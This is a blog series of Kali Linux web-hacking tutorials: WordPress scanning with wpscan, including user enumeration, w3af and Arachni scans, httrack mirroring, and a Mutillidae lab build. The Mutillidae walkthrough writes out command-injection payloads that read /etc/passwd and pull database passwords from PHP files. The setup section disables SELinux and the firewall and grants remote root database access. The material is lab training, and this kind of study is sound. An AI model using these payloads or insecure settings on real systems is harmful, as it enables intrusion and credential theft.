wpscan Kali Linux Tutorial to Know WordPress Vulnerabilities

wpscan check versioin

Millions of Websites are running on WordPress CMS today, Is your website one of them? If Yes, Do you know about vulnerabilities exist on your website?

Think Again!! Is your WordPress website is hackable?

Check Again! Your WordPress website for vulnerabilities.

Today’s topic is wpscan Kali Linux Tutorial to Scan WordPress Website for Known Vulnerability. Yes, we are going to find out vulnerable WordPress core files, Plugins, and themes.

Wpscan a small tool written in ruby and preinstalled in Kali Linux, if you are using another Linux distribution, then install wpscan first.
I was checking my client’s website without any potential purpose, suddenly one question arises in my mind lets check the security. I had installed Kali Linux on a VirtualBox So I had started wpscan to scan the website for getting details about plugin and themes.

Trust me I found lots off aggressive detection, for example, open files, files access directly in browser, usernames and more.

Wpscan Kali Linux Tutorial

Wpscan is used to scan the wordpress website for known vulnerabilities within WordPress core files, plugin, and themes. you can enumerate users for a weak password, users and security misconfiguration.

I am going to tell you all the steps on how to use wpscan in Kali Linux.

In Kali Linux just open terminal and write following syntax to run wpscan

#wpscan

One of the following options is required: URL, update, help, hh, version, or use –help option.

So I used following command to check for available options in wpscan,

#wpscan –help

For Check the version

#wpscan –version

Next step to update wpscan, The database used by wpscan is wpvulndb.com maintains by the team and ever-growing list of vulnerabilities.

#wpscan –update

Scan complete website by giving url followed by –url option

#wpscan –url https://www.yourwebsite.com

If you want to scan website for checking vulnerable Plugin add the –enumerate vp argument

#wpscan –url https://www.yourwebsite.com –enumerate vp

Check the result carefully and you will find lots of information about plugins, if any vulnerable plugin exists, you will see red exclamation icon and relate information.

Do you find any vulnerable plugin?

If Yes.
Update the plugin as soon as possible, if you cannot update, plugins should be replaced or removed permanently.

Scan vulnerable Themes

Similar as plugin scan you need to add –enumerate vt argument to check your website for vulnerable themes.

#wpscan –url https://www.yourwebsite.com –enumerate vt

If you get results with red exclamation icons, it means your theme is vulnerable. You will find url and more information.

Do you have a vulnerable theme?
YES
Update / Replace /Remove whatever you can.

WordPress User Enumeration by Wpscan

A small question for you:
“What if hackers know your WordPress website’s username?”
Will he hack your website?
What impact on your website?

Reply in the comment box.

By the way, it is easy to getting username list and their permissions by using a simple argument –enumerate u

#wpscan –url https://www.yourwebsite.com –enumerate u

If you are using Website firewall you will get error and wpscan will stop.

Brute Force Attack on WordPress website by using Wpscan

Password guessing in old technique to get the right password, and very hard if you are doing manually.

It is easy!

If you are using tool and a word-list.

At the end of tutorial, I am going to say a single phrase.
Don’t use your knowledge unethically.

If you have any questions tell me in the comment box.

Cheers!

Free Website Vulnerability Scanner – W3af in Kali Linux

Free Website Vulnerability Scanner - W3af

MODULE 15:- Website Hacking

  1. How To Create a Virtual Lab For Web Penetration Testing
  2. How to use httrack website copier command line
  3. How to use httrack website copier graphically
  4. Free Website Vulnerability Scanner – W3af in Kali Linux
  5. How to use Arachni scanner for Web Application vulnerability in Kali Linux
  6. Inject SQL Injection Script by using Firebug | SQLi Part1
  7. Mutillidae Part 2: Command Injection Database Interrogation

W3af- Free Website Vulnerability Scanner

If you are looking for free website vulnerability scanner and assessment tools , w3af is one of them. it is used to scan website for security auditing. it is a open souce web vulnerability scanner. It is used to scan application security services and find out web server vulnerabilities. 

w3af is an alternate lightweight escalated web vulnerability scanner brought to the security group from the fine programmers of OWASP web application security . Reporting is limited furthermore not as lovely as Arachni, however will give a decent basis to vulnerability reporting. The enormous playing point, or downfall depending upon how a pentester is captivated on a project, is that w3af has a plenty of adjustable vulnerability plugins that oblige redesigns from the Internet at the time the plugin is launched. Throughout a pentest occasion, if the analyzer does not have internet get to then w3af will create numerous failures. In the event that an Internet association is accessible, then the plugins will downloaded scripts and vulnerability checks, verifying that the output is as forward as could be allowed.

How to use w3af Website Vulnerability Scanner in Kali Linux :

w3af comes by default in kali Linux, and can be accessed by following location.

Click on Applications >  Kali Linux > Web Applications > web Vulnerability Scanner > w3af

Start w3af in Kali Linux

At the point when the w3af GUI opens, a vacant profile is loaded with no active plugins. Another profile could be made by first selecting the desired plugins then clicking on the Profiles -“Save as” choices from the menu bar. Some prepopulated profiles as of now exist and are accessible to utilize. Clicking on a profile, for example, “Owasp_top10” will select the profile to use for a scan. W3af has been intended for granular control over the plugins. Regardless of the fact that a preconfigured profile is chosen, conformity to the plugins might be made before starting scan. Without Internet access, executing outputs could be a trial by blunder occasion. Underneath the plugins determination window is an alternate situated of plugins. The plugins beneath are for reporting. All reporting is created in the/root/ envelope.

For this guide, the Owasp_top10 profile was chosen; on the other hand, the finding plugins have been turned off for now. HTML reporting is activated

w3af profile owasp top 10

Enter a target site. For this situation, the Metasploitable2 virtual machine was selected. Click the Start button.

Set output file in w3af

The consequences of the scan above are restricted because of the absence of plugins activated. To view the results in the HTML design that was select. Open Iceweasel and explore to: record://root/results.html.

vulnerability result in w3af

As you have seen W3af website vulnerability scanner linux comes with kali linux and used to find out web application vulnerability.

How to use Arachni scanner for Web Application vulnerability in Kali Linux

Arachni scanner

MODULE 15:- Website Hacking

  1. How To Create a Virtual Lab For Web Penetration Testing
  2. How to use httrack website copier command line
  3. How to use httrack website copier graphically
  4. Free Website Vulnerability Scanner – W3af in Kali Linux
  5. How to use Arachni scanner for Web Application vulnerability in Kali Linux
  6. Inject SQL Injection Script by using Firebug | SQLi Part1
  7. Mutillidae Part 2: Command Injection Database Interrogation

Hey friends, I am glad you here to reading my post part of web app security testing. If we think about security testing on web application then one question arise in our mind how to check vulnerabiliy in web application?

This article about Arachni scanner free and best website vulnerability scanner now days, after this you can go for web application security best practice by Kali Linux or another linux distro. You will be able to learn about Web application vulnerability assessment and web app penetration testing. 

Testing Web Application security by Arachni Scanner

The Arachni scanner is an escalated tool that runs from a web interface much likened to that of Tenable’s Nessus. Notwithstanding, dissimilar to Nessus, Arachni can just perform a scan against one host on one port at a time. On the off chance that there are different web services running on a host and not serviced from the port, then repeated scan will must be launch separately. For example, http://www.xyz-company.com/ is facilitating a web application security services on port 80 and phpmyadmin on port 443 (HTTPS), the Arachni scanner will must be run twice. It’s not a blaze and overlook kind of system. Arachni likewise has an exceptionally configurable structure. The plugins and settings for Arachni take into account accuracy checking, and all plugins are enabled by default. Reporting is a snap and could be designed in numerous diverse sorts of output.

Installing Arachni Scanner for Website vulnerability:

Arachni Web Application scanner is not exist in Kali Linux by default, A security analyzer have to install in Kali Linux by using apt-get commands. It will be installed on the Kali Linux system by using following command:

#apt-get install arachni

“Note: Repository should be configured in Kali Linux system” 

Add Kali Linux repository

Accessing the Arachni Web Application Security Scanner:

Click on Application > Kali inux > Web Applications > Web Vulnerability Scanners > arachnid_web

Accessing Arachni in Kali Linux

The terminal window launched shows that the web service for Arachni has been begun. Open Iceweasel and explore to http:// 127.0.0.1:9292 (according to machine configuration) to get to the web User Interface.

Arachni at first step to start

To launch a scan against the Metasploitable2 virtual machine, enter http://192.168.56.115 (IP Address of Metasploitable2 machine) into the URL content box and click on the Launch Scan button. While the scanner is running, the procedure is joined to a dispatch process. Multiple dispatchers can run in the meantime. On the off chance that there are more web services to test against, do a reversal to the Start a Scan tab and launch an alternate scan. On the off chance that Iceweasel closes or multiple scans are running together. Open the web program and explore to Arachni, then click on the Dispatchers tab to associate with each one procedure.

Starting scanning in Arachni

At the point when the scan is finished, Arachni will automatically switch over to the Reports tab. From here a pentester can yield the report into a few diverse formats. Similarly as with the scanners, Arachni likewise continues reporting separate for each dispatcher that was run.

Scanning running in Arachni

The reports do give bar and pie charts with the output comes about as appeared

Arachni breaks down the report into two subcategories. The main is named “Trusted,” while the second is marked “Untrusted.” Vulnerabilities that are recorded as trusted are considered as precise (or positive) discoveries in light of the fact that the scanner did not get any unusual reactions from the web server at the time of checking. Vulnerabilities that are documented as untrusted are considered to be conceivable false-positives and need to be checked by the analyzer.

Scanning result in graph view Arachni

Inject SQL Injection Script by using Firebug | SQLi Part1

Inject SQL Injection Script by using Firebug | SQLi Part1

MODULE 15:- Website Hacking

  1. How To Create a Virtual Lab For Web Penetration Testing
  2. How to use httrack website copier command line
  3. How to use httrack website copier graphically
  4. Free Website Vulnerability Scanner – W3af in Kali Linux
  5. How to use Arachni scanner for Web Application vulnerability in Kali Linux
  6. Inject SQL Injection Script by using Firebug | SQLi Part1
  7. Mutillidae Part 2: Command Injection Database Interrogation

Inject SQL Injection Script by using Firebug | SQLi Part1

• SQL injection is a method often used to attack data based applications such as website.
• This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application’s software.
• The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Video:

Inject SQL Injection Script by using Firebug | SQLi Part1

Inject SQL Injection Script by using Firebug | SQLi Part1

Posted by Cyrage on Monday, September 4, 2017

How to use httrack website copier command line

How to use httrack website copier command line

MODULE 15:- Website Hacking

  1. How To Create a Virtual Lab For Web Penetration Testing
  2. How to use httrack website copier command line
  3. How to use httrack website copier graphically
  4. Free Website Vulnerability Scanner – W3af in Kali Linux
  5. How to use Arachni scanner for Web Application vulnerability in Kali Linux
  6. Inject SQL Injection Script by using Firebug | SQLi Part1
  7. Mutillidae Part 2: Command Injection Database Interrogation

Hacker are looking for the vulnerability on website but some they find and some time not, But in other hand security researcher are using techniques to catch hackers red handed on crime place. So hackers copy the website first on local computer and start looking on code and try to find vulnerability.  In this techniques they use tool name httrack. In this tutorial I will describe how to use httrack website copier.  

How to use httrack website copier tool download

HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility.
This is a tool download website for offline on your computer’s local directory, for testing purpose. It copy web page  one by one on local directory.

If you are thinking to test a website for security purpose, it is recommended to download website on your local server. Setup a local web server and start accessing website like a real server. Now your local server has been created use it for finding vulnerabilities on website. better luck!

Here one more thing I want to share with you that Httrack doesn’t come with Kali Linux. if you are Kali Linux user then it is a problem, but not big. Httrack’s Linux available to download and install, So you can make available on Kali Linux easily.

Install Httrack on Kali Linux

I think you are aware with Advance package tool (APT), it is used to install, remove, reinstall of packages on Debian based Operating system like Kali Linux and Ubuntu. So here I am using apt-get to install httrack. before start installation we should update apt in Kali Linux for new headers. Execute following command:

#apt-get update

#apt-get install httrack

Start a Project to download website

You have download httrack, Now it’s time for new project. Here i am going to download my own website  https://www.cyberpratibha.com/blog/blog So first create a directory with project name.

#mkdir cyberpedia

How to use httrack website copier – step by step guide

Use following command in terminal.

  • #httrack
  • Enter Project Name: cyberpratibha.com/blog
  • Enter base path : where do you want to download website
  • Enter URL: Website Url
  • Select option and start mirroring website:

Video tutorial for how to use httrack website copier 

How to use httrack website copier

How to use httrack website copier

Posted by Cyrage on Sunday, April 23, 2017

How to use httrack website copier graphically

Httrack graphical

MODULE 15:- Website Hacking

  1. How To Create a Virtual Lab For Web Penetration Testing
  2. How to use httrack website copier command line
  3. How to use httrack website copier graphically
  4. Free Website Vulnerability Scanner – W3af in Kali Linux
  5. How to use Arachni scanner for Web Application vulnerability in Kali Linux
  6. Inject SQL Injection Script by using Firebug | SQLi Part1
  7. Mutillidae Part 2: Command Injection Database Interrogation

How to use httrack website copier graphically

Httrack is a free (GPL, libre/free programming) and simple to-utilize off-line browser utility.
It permits you to download a World Wide Web website from the Internet to your local computer assembling recursively all derectories, getting HTML, pictures, and different records from the server to your local machine. Httrack is completely configurable, and has an incorporated help framework.
In kali linux it is not found by default you have to install first and configure HTrack.
Video:

How to copy a website on you local hard disk

How to copy a website on you local hard disk

Posted by Cyrage on Monday, September 4, 2017

Mutillidae Part 2: Command Injection Database Interrogation

Command Injection in mutillidae

MODULE 15:- Website Hacking

  1. How To Create a Virtual Lab For Web Penetration Testing
  2. How to use httrack website copier command line
  3. How to use httrack website copier graphically
  4. Free Website Vulnerability Scanner – W3af in Kali Linux
  5. How to use Arachni scanner for Web Application vulnerability in Kali Linux
  6. Inject SQL Injection Script by using Firebug | SQLi Part1
  7. Mutillidae Part 2: Command Injection Database Interrogation

Mutillidae Part 2: Command Injection Database Interrogation 


What is Mutillidae?

Mutillidae is  a free, open source, Vulnerable Web-application provide a target for Web-Security analyst. It have OWASP-Top10 Vulnerability, and designed by OWASP.
What is command Injection?
Command Injection
is a web-vulnerability that allow attacker to run Operating System commands or Server side scripts from the web interface (Web application). Such type of vulnerability occurs when web application allow users to access any command for example nslookup, whois, ping, traceroute etc through webpage. This vulnerability can tested by fuzzing technique. In fuzzing attacker commonly used a word like “;” or “|” or “||” or “&” or “&&” end of expected input.
For example [expected_Input]; [command]

Pre-Requisite Web Penetration Testing Lab

1. Configured Mutillidae.
How To Setup Virtual Lab For Web Penetration Testing

Remote database access has been turned on.

2. Installed Kali Linux:

In Simple way Kali Linux is not necessary, but if you are penetration Tester you should use Kali Linux Virtual Machine.

Configure the network interface of both machine Fedora-Mutillidae and Kali Linux. Start both machine and check the connectivity between them.
How to install Kali Linux

Step 1: Access Mutillidae by Kali Linux Machine

On the Kali Linux Machine, Open IceWeasel
open browser in kali linux

Application à Internet à IceWeasel Web Browser
In the URL address bar http://Victim_Ip_Address/mutillidae (Victim IP can be obtained by #ifconfig command)
In mine case http://192.168.0.102/mutillidae

access mutillidae

Go to DNS Lookup
OWASP Top 10 à A2 – Cross Site Scripting (XSS) à Reflected (First Order) à DNS Lookup
OPEN DNS LOOKUP in Mutillidae
DNS Lookup is designed to do just that by a dnslookup utility in command interface
Hostname /IP: www.cyberpratibha.com/blog
Click on the Lookup DNS button and see your Results.

dnslookup for cyberpedia
Test DNS Lookup Vulnerability
To find the command execution vulnerability, just enter the hostname and then command separated by “;”. The procedure “;” after what the software expects, is called fuzzing. Enter following code
www.cyberpratibha.com/blog; uname –a
View you Results
command injecttion uname -a

Perform Reconnaissance:

It would be wonder if you get that particular web application is running from. In Linux you would be able to find current working directory by “pwd”. Follow the given instructions:

Enter: Hostname / IP: www.cyberpratibha.com/blog; pwd
Click on the Lookup DNS Button, and view you Results.
pwd command through dnslookup

Interrogate the dns-lookup.php application

The codes are filled by attacker is excuted by dns-lookup.php. Let’s see if we are able to find the line code where PHP is exciting a system call. Follow instructions

hostname; find /var/www/html/mutillidae -name “dns-lookup.php” | xargs egrep ‘(exec|system|virtual)’
C
lick on Lookup DNS button, Analyze you Results

“nslookup” Linux command is executing by a function called shell_exec(),

interrogate

Database reconnaissance:
Enter the following syntax

  • hostname; cat /etc/passwd | egrep -i ‘(postgres|sql|db2|ora)’

Click on the Lookup DNS button, View your Results. In the Result MySQL is the database engine.
database reconaisansce

Discover Database:

  • By using “ps” command you can discover the Database Engine. It is used to search for the process strings such as pstgresql, sql, db2 and ora.
    hostname; ps -eaf | egrep -i ‘(postgres|sql|db2|ora)’

Click on the Lookup DNS button to see the mysqld is running or not in the Result.
discover database

Database Interrogation:

In this step we will figure out if any php scripts contain a database name and password under /var/www/html/mutillidae. Fill the given syntax into the text box and click on the Lookup DNS button

hostname; find /var/www/html/mutillidae -name “*.php”

This command will display list of all php scritps into the /var/www/html/mutillidae folder. There is more then 900 scripts.
database iterrogation

Find the password in php scripts:

We will search all php scripts for the string “password” and ”=” command will be similar following
hostname; find /var/www/html/mutillidae -name “*.php” | xargs grep -i “password” | grep “=”
find the scripts contains password

Obtain Password from the Results:

See the string password, it is in actual

$mMySQLDatabasePassword = “toor”;

Search for user OR Login in the MySQLHandler.php

As We know the Database passwords are inside the MySQLHandler.php. following code is used for obtain the user or Login
hostname; find /var/www/html/mutillidae -name “MySQLHandler.php” | xargs egrep -i ‘(user|login)’ | grep “=”

Display MySQLHandler.php
I figure I could have demonstrated to you this to start with, however great things go to those that hold up.

It is possible to show the substance of the MySQLHandler.php program, by encoding the “<?php” and “?>” labels. These tags advise apache to execute a php script. To get around this issue and simply show the content of the project, we change “<” to “&#60;” and “>” to “&#62;”.

hostname; find /var/www/html/mutillidae -name “MySQLHandler.php” | xargs cat | sed ‘s/</\&#60;/g’ | sed ‘s/>/\&#62;/g’

Click on the Lookup DNS Button, and view the result.
display MySQLHandler

How To Create a Virtual Lab For Web Penetration Testing

Setup Virtual Lab For Web Testing

MODULE 15:- Website Hacking

  1. How To Create a Virtual Lab For Web Penetration Testing
  2. How to use httrack website copier command line
  3. How to use httrack website copier graphically
  4. Free Website Vulnerability Scanner – W3af in Kali Linux
  5. How to use Arachni scanner for Web Application vulnerability in Kali Linux
  6. Inject SQL Injection Script by using Firebug | SQLi Part1
  7. Mutillidae Part 2: Command Injection Database Interrogation

How to install Mutillidae on Fedora 20

What is Mutillidae?

OWASP Mutillidae project is a free, open source, deliberately vulnerable web-application giving a focus to web-security lover.

With many vulns and clues to help the client; this is a simple to-utilize web hacking environment intended for labs, security devotee, classrooms, CTF, and weakness appraisal apparatus targets. Mutillidae has been utilized within graduate security courses, corporate web sec instructional classes, and as a “survey the assessor” focus for defenselessness evaluation programming.

Pre-Requisite

Installed Fedora on VirtualBox
How to install Fedoar on VirtualBpX Click Here

Downloaded Latest version of mutillidae
http://sourceforge.net/projects/mutillidae/

Step 1: Configure Fedora 20 Virtual Machine Settings

  1. Open VirtualBox
    Start your Host Computer, Go to
    Start à All Program à Oracle VM VirtualBox à Oracle VM VirtualBox
    OR
    Click the Start Button
    Type “VirtualBox” in the search Box
    Click On Oracle VM VirtualBox
  2. Edit Fedora Virtual Machine Settings

    Select Fedora Virtual Machine
    Click on the Setting button, exist left top corner of VirtualBox
    Edit Network Adapter: Highlight Network in left menu option, Then configure network Attached to: NAT
    Configure VirtualBox before start installation of Fedora

Step 2: Configure Fedora for Mutillidae

  1. Hilight Fedora Virtual Machine then click on “Start” icon on the top left corner of VirtualBox
  2. Login to Fedora

    Username: Victim Fedora
    Password: <Whatever you Set>
    Open terminal and switch to “root” root by using following command
    $su
    <password what ever you set for “root” user>
    Mutillidae Login

  3. Open Console Terminal and Check the connectivity with internet by using following command:
    #ping www.google.com

Step 3: Disable SELinux

  1. Open the SELinux configuration file with any text editor software in Linux
    #gedit /etc/selinux/config 2> /dev/null &Mutillidae disabled
    gedit: is a text editor for the GNOME Desktop.
    /etc/selinux/config, is the file name.
    2> /dev/null, sends standard error messages to a black hole (/dev/null)
    The “&” is used to run gedit in the background
  2. Delete enforcing.

    Take cursor down to SELINUX=enforcing inside the /etc/selinux/config file
    Delete the enforcing word.
    Replace “enforcing” with the word “disabled”
    Click the save file
    Mutillidae enforcing

  3. Next two commands are required to disabled SELinux properly
    #setenforce 0
    #sestatus
    Mutillidaesetenforce
  4. Disable the Firewall

    #service iptables stop
    #chkconfig iptables off (
    is used to disable firewall permanently)

Step 4: Install Required packages

  1. Install Apache httpd Server
    Apache is a Web server used to make computer work as Web Server It can installed in Fedora by using following commands
    #yum install httpd.i686
    “y”
    (It will ask later for use confirmation)
    yum install httpd
  2. Start Apache Server
    Apache listening Daemon can be started by using following command:
    #service httpd start
    Check the status Apache is running or not
    #ps –eaf | grep httpd
    #chkconfig –level 2345 httpd on
    These command is used to start up script of httpd for given run levels 2, 3, 4, and 5.
    start service httpd
  3. Install mysql and mysql-server
    #yum install mysql.i686

Is this okay [y/N]: y and hit enter to proceed
#yum install mysql-server
install mysql
 Is this okay [y/N]: y and hit enter to proceed
#service mysqld start

service mysqld start
Service mysqld can be made to run at every startup then, it is created a startup script for run level 2, 3, 4, and 5. Setup the password for mysql “root” user password to “toor” by using given commands
#mysqladmin –uroot password toor
set root database password
Login to mysql
#mysql –uroot –p (Enter)
Enter the password: toor
>show databases;
>quit
login with mysql
Allow Remote Access to MySQL
Remote access is not part of Mutillidae installation. Remote Access can be allowed by using following commad.
#echo “use mysql; GRANT ALL PRIVILEGES ON * .* TO ‘root’@’%’ IDENTIFIED BY ‘toor’ WITH GRAN OPTION;” | mysql –uroot -ptoor
remot access allow

  1. Install PHP
    Install PHP:
    #yum install php.i686
    Is this okay [y/N]: y and hit enter to proceed
    install php on fedora
    install php-mysql:
    #yum install php-mysql
    Is this okay [y/N]: y and hit enter to proceed
    install php-mysql in fedora
    Install php-pear
    #yum install php-pear php-pear-DB
    Is this okay [y/N]: y and hit enter to proceed
    Install php-pear in Fedora
    Install php-mbstring
    #yum install php-mbstring
    Is this okay [y/N]: y and hit enter to proceed
    Install php-mbstring in Fedora
    Open & Edit php.ini
    #gedit /etc/php.ini 2> /dev/null &
    gedit is a text editor for Linux platform “/etc/php.ini” is php configuration file. The “&” is used to open gedit in the background
    Search à Find..
    Search for: ; extension
    Click to find button
    In the next line of ‘; extension_dir = “./”’ add the following code
    extension=mysql.so
    Save and close the file.Restart Apache :
    #service httpd restart
    Install wget :
    #yum install wget
    Is this okay [y/N]: y
  2. Install Mutillidae
    Download the Unzip file of Mutillidae project for Web penetration testing
    Copy in /var/www/html
    unzip LATEST-mutillidae-<latest Version>
    unzip mutillidae for web server
    Open & Edit MySQLHandler.php
    #
    cd mutillidae/classes/
    #ls –lrta
    # gedit MySQLHandler.php 2> /dev/null &
    The MySQLHandler.php is the file of mutillidae database configuration file. Arrow down at the line “$mMySQLDatabasePassword = “” and set the password as “toor”. Save and close the file
    go to mysqlhandler use for edit
    Change the ownership:
    Go inside the location /var/www/html
    #chown apache:mysql mutillidae
    #chmod 770 mutillidae
    #ls –ld mutillidae
    change the ownership of mutillidae
    Start the Firefox
    And enter http://loacalhost/mutillidae in Address bar.
    mutillidae setup
    Click on setup/reset the Database
    Setting up the database
    Click Ok button
  3. Welcome to Mutillidae ………
    mutillidae final